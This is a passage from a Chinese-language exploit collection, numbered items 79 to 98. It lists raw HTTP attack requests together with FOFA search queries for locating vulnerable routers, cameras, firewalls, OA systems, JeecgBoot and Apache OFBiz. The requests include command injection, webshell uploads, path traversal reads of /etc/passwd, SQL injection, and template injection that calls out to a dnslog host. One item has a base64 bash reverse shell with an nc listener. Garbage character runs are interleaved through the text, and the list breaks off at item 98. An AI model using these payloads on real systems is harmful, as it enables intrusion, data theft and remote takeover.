------YsOxWxSvj1KyZow1PTsh98fdu6l
4 z, s5 K: S2 _* P" V) p( AContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
2 q  y, [8 Q8 ^4 sContent-Type: image/png. |' x& ?% A, v, n" h4 F# C% f+ Y
+ i" s" `! f3 C7 z. u6 O* _# W
YsOxWxSvj1KyZow1PTsh98fdu6l2 a6 r3 x7 V2 d2 b6 G" p
------YsOxWxSvj1KyZow1PTsh98fdu6l2 {! }. S! s6 \. L4 F. O0 ]$ ]) Q
Content-Disposition: form-data; name="target"8 y; ~9 W5 j6 h- z( _- Z" V
/ q3 D8 L0 d3 s2 a' [6 u5 e
/Applications/SkillDevelopAndEHS/
+ d: k0 h+ g2 ^% O5 y" ]------YsOxWxSvj1KyZow1PTsh98fdu6l--( I2 e) ~2 w. K/ s$ x- B

5 t4 D4 r0 I' N7 Q. ^- z9 l& M* Z, V& ~  c& d
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
) g* O% `# _" ~Host: x.x.x.x
- n' k' y' O$ e2 m! N" Q: c4 T# o; G8 J  Q9 j+ m0 I) C

4 e; I6 z) b- E' |79. BYTEVALUE 百为流控路由器远程命令执行, e8 z0 w, m' y, a( Z; s
FOFA:BYTEVALUE 智能流控路由器5 k( r1 {$ B( {! C' u6 o/ a
GET /goform/webRead/open/?path=|id HTTP/1.1  W  `3 B, \, D% t( Q) T) ~
Host:IP5 g# I7 V: k% \! _+ F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0' W/ P: B# \8 }7 }; J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% s' O3 E: k  v) i8 P- vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 y# v) j* |6 }0 r2 W, B2 w
Accept-Encoding: gzip, deflate5 N0 |$ b" M- ?. }3 t
Connection: close
+ h: ?% a+ R% G3 E/ oUpgrade-Insecure-Requests: 15 c4 r; d2 J' y& c" o/ k" V( z
  q/ o7 J; @  m- ]# q# d* _

+ u2 L- t% b' j, d80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传* P* b) Z& u- m* B: [
FOFA:app="速达软件-公司产品"
7 z; x* R3 t0 a9 T; ?0 C; C5 l# aPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
0 x8 E" s4 n; C; ^' z' x4 X7 qHost: x.x.x.x! L# _5 k9 \; a9 k% H/ C  P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& p* m" ^! y7 @( {- |
Content-Length: 273 }$ r( o5 C) V6 e& n: \" @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 D( K7 K/ i' u0 u+ L
Accept-Encoding: gzip, deflate
- S8 r5 ?: K) o/ `  K) U8 rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 i4 w# B/ Y/ N5 qConnection: close
, D5 \. \" l9 U  F( ?- ?7 BContent-Type: application/octet-stream
8 p, b/ q( y* a- t& U+ V/ A; fUpgrade-Insecure-Requests: 1
. z) ?. B/ {0 V+ p  d6 O9 J' T% \/ a: B" p
<% out.print("oessqeonylzaf");%>
# l6 e  c9 d  c% }
) ~* j4 a1 M0 f9 e  \8 j1 R! Q4 u9 R6 j8 d( S
GET /xykqmfxpoas.jsp HTTP/1.15 l' |5 H. A+ P' y5 N; O* l
Host: x.x.x.x
, p3 |4 R9 n# ^- hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# @. w) Y' o/ ^1 C" O" x; w4 L# _4 [
Connection: close+ K& `2 e# P! x% F3 W3 N
Accept-Encoding: gzip
! g% ^5 F% l' D2 m+ |% @+ Y( m8 n
* d" Z8 N- N( ~. k% c' T  n
; z- ?) b, {) O: A: [& e81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
' I1 A$ N" Q! Y& P. e# O' q& AFOFA:app="uniview-视频监控"
* b' ~2 y4 T9 T+ B7 xGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1/ y( e+ W0 O: Y9 _; H7 m
Host: x.x.x.x
/ X, c& N( T1 I7 [1 o1 ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 g8 h0 N3 x1 c0 x) M  Y
Connection: close
' t% G! e4 r: J) d0 rAccept-Encoding: gzip+ V# _8 M/ x2 b5 ], V7 S
) {) b' n0 t- H4 t: \
) }1 F/ c- G$ J. v
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
# m% i# l# x7 J( UFOFA:app="思福迪-LOGBASE"
- x9 V! Y6 S" M$ {POST /bhost/test_qrcode_b HTTP/1.1  F, _, E3 D* g% E5 Z
Host: BaseURL
' [5 q- e3 B1 ]5 H+ mUser-Agent: Go-http-client/1.1
3 d  C0 E0 Q/ ~2 I' m9 x, S/ d6 }/ nContent-Length: 23% I  y3 A  F: s
Accept-Encoding: gzip. B! O4 w. X! Z: a8 h
Connection: close
& w$ a) _* v% oContent-Type: application/x-www-form-urlencoded7 z& z- P$ o# L/ G
Referer: BaseURL
: g( T* U# [8 {8 P8 i# B* w* g) Z( z! \7 x
z1=1&z2="|id;"&z3=bhost
$ h) D: [, L: h+ D7 n4 p9 c
4 P- Y) E0 ~% k0 T- K& L# f" b9 U/ j( X8 I% e7 u
83. JeecgBoot testConnection 远程命令执行
! M1 V1 J( @9 }' k- z5 JFOFA:title=="JeecgBoot 企业级低代码平台"$ H1 @/ v( @6 C! p, ^0 M/ @) i
6 @& B; T3 Q3 A

9 K+ x3 f2 Z/ U; cPOST /jmreport/testConnection HTTP/1.15 m6 B0 |/ A5 j4 I
Host: x.x.x.x) }# \. _8 W/ I* C$ r" {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! _5 v1 Z  O' ]1 P/ A
Connection: close1 c* f- `& n% {( R: s
Content-Length: 8881  G( \* g& ?. L! ~1 v, f
Accept-Encoding: gzip
6 @4 q& c& a8 {Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
8 Q  z/ ?5 X' K3 g; a' y6 JContent-Type: application/json  T" {) A9 }" Q
  w0 j. G/ u: f: z' N7 `, |
PAYLOAD
, k/ V6 ]" L/ l4 ~. ~2 S# `" q+ R" |, U: L1 I. q
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入& h* O! h4 t( C7 A( S9 w
FOFA:title=="JeecgBoot 企业级低代码平台"
" c6 j# k7 x" y
* ~  K, i" @8 K0 w9 t7 \' C. Q9 u/ [6 t  [
+ }5 L7 `8 s6 v/ }1 q+ b7 S8 k
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1# z7 w; r6 V( v0 h0 _
Host: 192.168.40.130:8080
2 Q5 f, `- p# RUser-Agent: curl/7.88.1" ~" W& j2 c/ i8 y
Content-Length: 156
# m2 N# Z2 ]5 hAccept: */*
0 y$ V" G7 S: l; l# s* d: z  u. ^Connection: close1 @. r  N6 g! n! ^/ o: z# ~5 G
Content-Type: application/json
; ^' q' B; l1 z" }5 SAccept-Encoding: gzip+ M; B7 j6 a# r: k$ ~1 D
' J$ v: f* O! `) O7 I
{$ ^, {9 E7 x9 l! d
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",* r, F% k# O+ q9 s
  "type": "0"2 a0 i, u- \$ P9 W: k
}, f& n; S/ f. Y( b6 @3 J
1 q6 V2 {$ q" W. m* W% r

$ m1 Z. S2 \2 b2 n) v& g3 ~- C85. SysAid On-premise< 23.3.36远程代码执行+ J- w" a/ ]* w4 o0 q
CVE-2023-47246
4 ]# C' v& ?6 S9 t% zFOFA:body="sysaid-logo-dark-green.png" % r, X% c# M7 X# B5 S) u
EXP数据包如下,注入哥斯拉马
+ d$ \' z( }- M. ^* v" D7 s5 _POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1* |& C* g' I- \: ]; j: _+ p2 g
Host: x.x.x.x* R( R! E/ G9 Y  C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 p' m! h1 C3 X: a
Content-Type: application/octet-stream, D! Q* E- S; k  i  L3 Z
Accept-Encoding: gzip& P: T8 y, U7 @- t: ]

8 F# v0 D; C3 F3 d6 T; [- G% \+ QPAYLOAD; d$ g5 P9 F9 |7 n; o
+ p" [) t$ c3 d) f$ c0 K$ ^4 L- @
回显URL:http://x.x.x.x/userfiles/index.jsp: C; @$ i  W1 l6 ^

, q( n- Q2 n8 W86. 日本tosei自助洗衣机RCE, J/ n+ P1 k# E
FOFA:body="tosei_login_check.php"
+ }5 o; u5 o) mPOST /cgi-bin/network_test.php HTTP/1.1
9 n# e5 s# u' f4 \" r, U+ FHost: x.x.x.x
3 G  M% m  g% j: r( V7 ~User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36/ Z. D4 J1 b: ~4 l" X
Connection: close3 i# u6 Z. D7 r6 X1 q
Content-Length: 448 y! Z2 @" S9 q& U) N' `
Accept: */*
4 Z- \2 ~, n9 C0 j$ cAccept-Encoding: gzip
! J; F5 @& e. O3 qAccept-Language: en" a( Y# f( x' D; `' T! z, L( {
Content-Type: application/x-www-form-urlencoded
/ s; ^+ S6 v$ v9 g' u2 p* [( o1 Z" V6 K" H
host=%0acat${IFS}/etc/passwd%0a&command=ping
, o! s: d, l  [# q7 T
7 `& a. r/ {: l. P6 r- d% I3 z4 ~3 W. u# _- s
87. 安恒明御安全网关aaa_local_web_preview文件上传+ H9 m% j5 G" \; v3 D# e/ q
FOFA:title="明御安全网关"
- X0 Q! P; W2 S( f+ sPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
7 ^6 y9 E9 M$ I( E6 U- W# A5 \Host: X.X.X.X7 o+ {. w- p4 g" u8 v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( k3 H* k5 f/ S( q* f; _2 X3 l
Connection: close- [# U, S$ E' x1 \; A* U
Content-Length: 198
% |0 U& ?. V4 I4 W5 iAccept-Encoding: gzip
+ ~' H, h) L  ~: I$ tContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd5 ^; r# t; p' C- F
- `/ P7 ^0 P' p6 }  f" w
--qqobiandqgawlxodfiisporjwravxtvd
2 {6 h9 V+ C( f0 G8 q( xContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
2 ^/ z) w8 |# q) M, s( Z, EContent-Type: text/plain: L1 W5 @: o8 w

+ y1 |) s& T5 d3 h3 q2ZqGNnsjzzU2GBBPyd8AIA7QlDq
! ^* y1 Q) F$ R" t% _( X--qqobiandqgawlxodfiisporjwravxtvd--* r. V1 c) p. ^4 _! G: b+ [; E
2 ~; G% \3 R7 q2 _

1 \3 S" ?' L! m7 d/jfhatuwe.php% Q: A6 u$ {) `$ c/ }. `' ~/ J

! ]# e+ [* [2 _+ }: `88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行" D8 m# p( |2 }/ j6 Z
FOFA:title="明御安全网关"% j; y* t# H2 i3 b; ]0 {
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.12 n' L% S1 ]4 }( W6 W% o( M
Host: x.x.x.xx.x.x.x$ O& D& n' T! ~' C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* U/ ?$ Z; _2 H$ `/ k5 ?* h& u3 kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' A! e! o8 ^4 x/ t' }- b9 G
Accept-Encoding: gzip, deflate
0 Z2 x+ x) E( f2 w0 j1 jAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 M5 _$ I; k! L- k& w- yConnection: close4 v+ |  z0 U- c8 L. V

& q! y* @1 h' q" ~3 N3 K5 m( \/ P  _" G7 ~; u/ j
/astdfkhl.php
. u3 I4 n8 p9 Y- W% n" `0 t/ u; f% ?( k' L! ^- [+ P" B
89. 致远互联FE协作办公平台editflow_manager存在sql注入
. w2 a2 h8 O; x& pFOFA:title="FE协作办公平台" || body="li_plugins_download"
5 G8 T$ [5 f) H, g% |5 G5 R. cPOST /sysform/003/editflow_manager.js%70 HTTP/1.15 \- j- O. R3 x/ ~
Host: x.x.x.x
) V' r9 S: [1 }" b- ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, _1 W: m  {9 |( _3 }Connection: close
7 D0 }% \- R4 a  BContent-Length: 41
2 @- q: U  I- T; L, L9 f7 vContent-Type: application/x-www-form-urlencoded
' w3 v  R+ a- w* r& e$ r3 NAccept-Encoding: gzip
9 r# C- c9 W0 |. _, E+ L; q
4 X7 ^/ c" f5 w$ Hoption=2&GUID=-1'+union+select+111*222--+& {6 @5 m# `6 ?. j

+ l6 d3 _& v) j
& g- x5 v$ R- _$ k90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
$ G6 R' \! W& Z8 g, K  eFOFA:icon_hash="-1830859634". f. J, e: r/ `" I, ^
POST /php/ping.php HTTP/1.1& f) _$ V4 E' Z/ R5 r, V6 b
Host: x.x.x.x: x5 W9 ^6 p- p/ {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
$ K9 u2 m$ M2 d4 jContent-Length: 51& s; V5 {: h/ C7 E! H
Accept: application/json, text/javascript, */*; q=0.011 Y: w( U& g% ]% H, t* ~
Accept-Encoding: gzip, deflate% C5 v/ r! X" f' X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, X3 F$ B, G" q' f2 }
Connection: close1 N# e7 N+ [. S
Content-Type: application/x-www-form-urlencoded
+ R) U7 {' `$ b& S! \, `: \X-Requested-With: XMLHttpRequest
* U, U+ _) W1 D: d; O+ c9 [' d+ e1 g. }+ D& x
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
# Q+ e4 M9 O& i3 Q9 e1 I
! d( ^& F0 G, R9 v& R7 f2 M* R) F. \- W& ~& N4 {
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取: F" ^; W8 p7 @9 V) l+ f/ V' ?
FOFA:title="综合安防管理平台"$ M# `  ^5 f; v" v
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
7 k8 }  l2 @0 d! t. NHost: your-ip, J7 I4 f% r* Z7 ~' d; \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.363 ]6 C$ h5 P0 `  s- v, l+ Y
Accept-Encoding: gzip, deflate
1 ]/ Y/ Z- k* f3 o9 J! Q+ K: \# g. a( uAccept: */*
' f1 z! q5 X: D% J4 TConnection: keep-alive6 A! b0 x1 x6 b( B7 U4 \
2 `$ H. A3 |; U, m
- Q" e4 L* g& x' b& _9 z' M

  }, R9 \, \, G& d% x1 A* z1 @92. 海康威视运行管理中心session命令执行$ h1 n% A6 n# B# H/ C) }  O. _
Fastjson命令执行
6 v7 Q% y' v. y8 O( ]; }# qhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76": Q0 B+ j# b# j) W& A/ C
POST /center/api/session HTTP/1.1/ _4 x) Q! _# l
Host:
; E( b' Q  \- e- a. ?$ @. |Accept: application/json, text/plain, */*9 r' T) s; N  I- V, Z
Accept-Encoding: gzip, deflate0 v4 `5 L8 a5 F! W& U! E
X-Requested-With: XMLHttpRequest
+ H* D! i( i* Q5 u4 @0 U" V9 vContent-Type: application/json;charset=UTF-87 J1 v6 Z$ F" W3 ~6 W$ m5 n( g
X-Language-Type: zh_CN
" c  V9 {- P) N1 s7 H  ~0 d9 YTestcmd: echo test
6 w( W8 y- k, Y2 p  NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
; @" J0 n# T& c$ ?  h" ]) Y, b# ~  yAccept-Language: zh-CN,zh;q=0.96 y7 e3 q: Y# w9 G
Content-Length: 5778! H' G/ [/ S+ A# h1 ?
, `6 Y# n' |% N
PAYLOAD
6 Y4 ^" _4 R! Z6 O
. r8 ?. F& P7 X$ L6 q" x' F; z! }7 y  y* h4 j: D
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传$ s# T: L! U% I
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
, L) R8 N2 B& E0 q, RPOST /?g=app_av_import_save HTTP/1.1
& q* V7 b6 z/ m5 k3 D! ]! rHost: x.x.x.x
5 M7 s0 \. v! B: ~- X8 BContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
2 W* B. r) ]% O8 Y& z; c5 V2 XUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36( @  E" j7 y0 o! J3 c
' [* @0 w' E- T4 T" R6 [
------WebKitFormBoundarykcbkgdfx* v+ [# `7 \- ?3 x
Content-Disposition: form-data; name="MAX_FILE_SIZE"
1 o5 S- ]- H2 `8 R* J# `6 s6 @3 ~, o3 M) H
10000000% X. K7 @6 ~4 _9 y6 f* k
------WebKitFormBoundarykcbkgdfx, [. E" H0 ~; f' _1 ?1 P
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
2 T$ Y9 W# T) C9 y) XContent-Type: text/plain
: i7 C0 E8 M/ S" t: X5 F3 q" I$ ?8 ^! F1 h% A' [
wagletqrkwrddkthtulxsqrphulnknxa
# D/ U- `" B: o# g1 I& m  l) Z------WebKitFormBoundarykcbkgdfx9 e7 A, A0 W7 l0 K, s
Content-Disposition: form-data; name="submit_post"
4 i- \. [, L7 E6 l5 e9 O
% x0 r3 [7 K  _- E: p" Z5 R, Yobj_app_upfile
- a9 t, ]3 I" B# K& ^------WebKitFormBoundarykcbkgdfx
( ^6 l# R5 r6 g) R: tContent-Disposition: form-data; name="__hash__"( H* E: Z+ b' t4 S
1 @' y- G2 j  v
0b9d6b1ab7479ab69d9f71b05e0e9445
" ^7 w. |8 }, C+ Y0 Y------WebKitFormBoundarykcbkgdfx--
; O5 L/ g0 W/ l- ]
* p* y7 c# b6 e9 G7 s7 m2 q
- ~" W  `- }0 B* C3 d# b! Y/ x; BGET /attachements/xlskxknxa.txt HTTP/1.1
2 ?$ F5 Y% M  E, O( J8 X4 X1 u" ZHost: xx.xx.xx.xx$ B  k( e2 J9 G$ w7 h' E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36. L# T2 P" {  k5 t2 |
0 {/ F& r, h+ o- M
9 g, |" k$ R) x
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传. Y- `) K3 r& B" R% d. D4 r$ y
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
; @" U0 M2 x5 Y- n- k% u0 u9 w6 l1 bPOST /?g=obj_area_import_save HTTP/1.12 g+ G9 q" `  M1 [; ?# X& q7 y. k& T" m
Host: x.x.x.x
/ G$ m3 a& _8 GContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
, ^* G2 ?, V: ^( x5 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
. V/ [. N7 t( j( \" A. s0 B! e5 R1 B4 p) ^# C/ }
------WebKitFormBoundarybqvzqvmt" k: l% S* U( {- [& m' K3 _- }0 Z
Content-Disposition: form-data; name="MAX_FILE_SIZE"
- Y- {& z- W! o* m6 N1 `
. K0 q; X$ i! I8 {# s& k10000000
5 O4 A9 e# c" w! R------WebKitFormBoundarybqvzqvmt* Q) l2 Z+ v: O$ _
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
& C/ @) w, m! R8 |9 CContent-Type: text/plain
0 O) t4 `4 F8 I8 z* ^
1 u; T2 B2 z. R4 l: t. i" bpxplitttsrjnyoafavcajwkvhxindhmu
* g7 P* @% N* c( m------WebKitFormBoundarybqvzqvmt
2 S6 t: j( s" l7 u- x# yContent-Disposition: form-data; name="submit_post"
, l8 y- X& _  d$ t% u+ |/ V  w3 a. v; e. l- R$ f( p3 \4 q
obj_app_upfile7 d8 o  P2 r9 D  B" \
------WebKitFormBoundarybqvzqvmt1 J' V4 v: G7 R% s8 [) e
Content-Disposition: form-data; name="__hash__"
. o$ O0 X! n. }# g. ]7 a1 M& z! G8 u+ |0 p( c" Q, p+ ?
0b9d6b1ab7479ab69d9f71b05e0e9445
( K: C$ G9 p; R, t$ |. c------WebKitFormBoundarybqvzqvmt--
+ D* _$ T, i% R% N0 p; ]7 m8 K4 c# p) G

" H3 q' B6 d: g9 \" p/ m5 |( k9 e7 ]
GET /attachements/xlskxknxa.txt HTTP/1.1
- o' T7 J' N9 _' K) n4 KHost: xx.xx.xx.xx
1 B* y9 q0 w6 KUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ {2 ?9 a2 q' `: d5 k/ a' h3 i0 u* Z5 ?) I8 C5 c

2 y0 u7 l( {, U6 ?1 @
/ o# d$ H1 X9 D& o  }95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行! i' c& f  {- _" B; f, @4 t
CVE-2023-490701 A8 z) G8 i' a) G" Q
FOFA:app="Apache_OFBiz"7 h( e, M: Y; d. z! ], ?
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
% P( K: g- a6 GHost: x.x.x.x" H9 l/ c( ~# [1 K, o* N8 P5 A* m
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36) L. @; t% y- X  U8 Q7 @# Y- {
Connection: close
# C) S3 }, a3 v# m! q9 iContent-Length: 8892 c* B# t& A# @
Content-Type: application/xml# U+ L, }4 `& D3 d5 B) {! T
Accept-Encoding: gzip
3 Y4 B3 t3 ]2 b' m* }+ p3 y. e; b# c8 Y$ U/ t" a2 T) E
<?xml version="1.0"?>
* B0 t! P- E/ `! x" c+ L5 c<methodCall>
$ |; x5 S; K: l8 w) J5 O. I   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
- s, @3 c. D1 `4 d0 \$ L' O- k! s* s% o    <params>2 x( b2 o, B$ o- n" Z3 H% Q9 g' H  a
      <param>$ I# [2 I6 _$ ]3 T, \% R
      <value>/ C" O: D  r  @  |3 e
        <struct>0 ^( a, r' X) @  ~
       <member>, }! N$ z+ _0 m+ v( T- w+ \- X
          <name>test</name>! n( D/ r" O2 I
          <value>
% k! ~7 p6 |* P/ ^% N& o0 J      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
* n; K$ B( h: c" ~0 g( X7 L% Z          </value>
. A$ K: y, K- n6 A, M  ?2 G$ F        </member>
/ t0 d  H: P! ?0 }- t1 P! d      </struct>0 i3 w; `; H" B; N( k' @  L
      </value>
8 {4 _9 j0 ?- W9 O% F    </param>
) V/ q6 Q5 _3 f! ^5 l    </params>+ Q4 r) J0 u" @' b3 r; b
</methodCall>
0 b) N* R; ^! G- Y" @: R  O
/ f: C  c, j  W7 ^: Q& q6 b, f9 W
用ysoserial生成payload4 l; ?0 @# Q, @  r9 L
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
* t9 [- k0 B% @8 r5 }- j+ \5 h
4 q+ L$ G! a& J5 w: d4 `7 b+ q/ o; z1 z, q
将生成的payload替换到上面的POC
' F& V$ l$ b/ E0 _* mPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.11 k, ]3 ~7 Z5 G9 g' T% R1 t
Host: 192.168.40.130:8443& g3 D2 Z( _, [9 I5 z& s( A0 }) J
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
# [# I( X$ X1 S' L( D- c% l7 \Connection: close/ {" C. |5 J! h! `% t: c( T  R
Content-Length: 889& f$ ?# j" b5 T; K1 p& y  q# D
Content-Type: application/xml' T, J( m5 ^- j' a2 {1 k
Accept-Encoding: gzip
* r8 k3 |$ ~) ?! C" j* W6 X0 f! M( r2 V& W
PAYLOAD
/ h+ J+ U3 ^, z) g* n  u8 S+ W( ?. h
96. Apache OFBiz  18.12.11 groovy 远程代码执行! m( k& r4 ^2 t' Y" n2 w
FOFA:app="Apache_OFBiz"6 d; g, J8 y4 B* Q
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1- A# G8 B1 W$ l# C& l
Host: localhost:8443  w) [: T8 u6 q) f, [: w5 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0: W+ x! J2 N: ~9 L. w, c& c
Accept: */*
5 W2 t8 |6 t# wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 \; i! L4 b3 i' C" c( t( B6 k' I
Content-Type: application/x-www-form-urlencoded/ b7 T1 P. a7 ~% k
Content-Length: 552 Q! K, B5 D" O
- n+ d; L" n- s. D4 a$ N8 a; {& o
groovyProgram=throw+new+Exception('id'.execute().text);# t- C7 M2 `- w' J  A, N- a# E! b) H
; o& Q- s5 g2 N$ f9 k
) G$ {" i: ^( O* Q
反弹shell
/ U( \- Z( z) V* {  G  o0 Q在kali上启动一个监听3 Y2 S) \' S; d7 s- M1 V
nc -lvp 7777- l1 @+ U4 @7 \, ~/ N3 D

3 t* i9 t% e. v) H! O2 ?POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
, M% ^6 f9 b% r5 o/ y1 s* QHost: 192.168.40.130:8443
, N: W, d/ V  q1 l: x4 o2 q5 _( HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 B' U* _3 C: ?. [0 _Accept: */*( _, K8 o# b- c% F9 @) i  Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ _: x) s$ N' P1 I9 Z( N
Content-Type: application/x-www-form-urlencoded
( @5 t+ w+ E' D2 k+ Q7 cContent-Length: 71
& D2 y; R2 l/ a2 J( h6 H
- c6 o% \$ C3 {$ ^1 N( ZgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();2 D  r$ q% N" r2 D  k: T" W& m* }

, }1 K4 Y% S/ q9 T- g8 C97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行- W2 m3 m! n: o+ F
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
( t: V# |7 A! E. i0 |/ zGET /passport/login/ HTTP/1.1
6 E( N3 y7 i" D$ uHost: 192.168.40.130:8085, y" P3 f/ R, A) Z8 b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# y9 A, m; @5 F: |  v! q; FAccept-Encoding: gzip
" }. c* H" u2 Q' ?Connection: close
/ v9 e& M/ ^+ q& G" \Cookie: rememberMe=PAYLOAD
5 C1 \) L8 Z2 ]" Q1 Y6 s2 ?& uX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk") Y1 T6 G. C& |1 t
' r" Y/ F/ t, F0 @4 g# O$ X

# |9 D+ s; u( H1 I) ~: d98. SpiderFlow爬虫平台远程命令执行
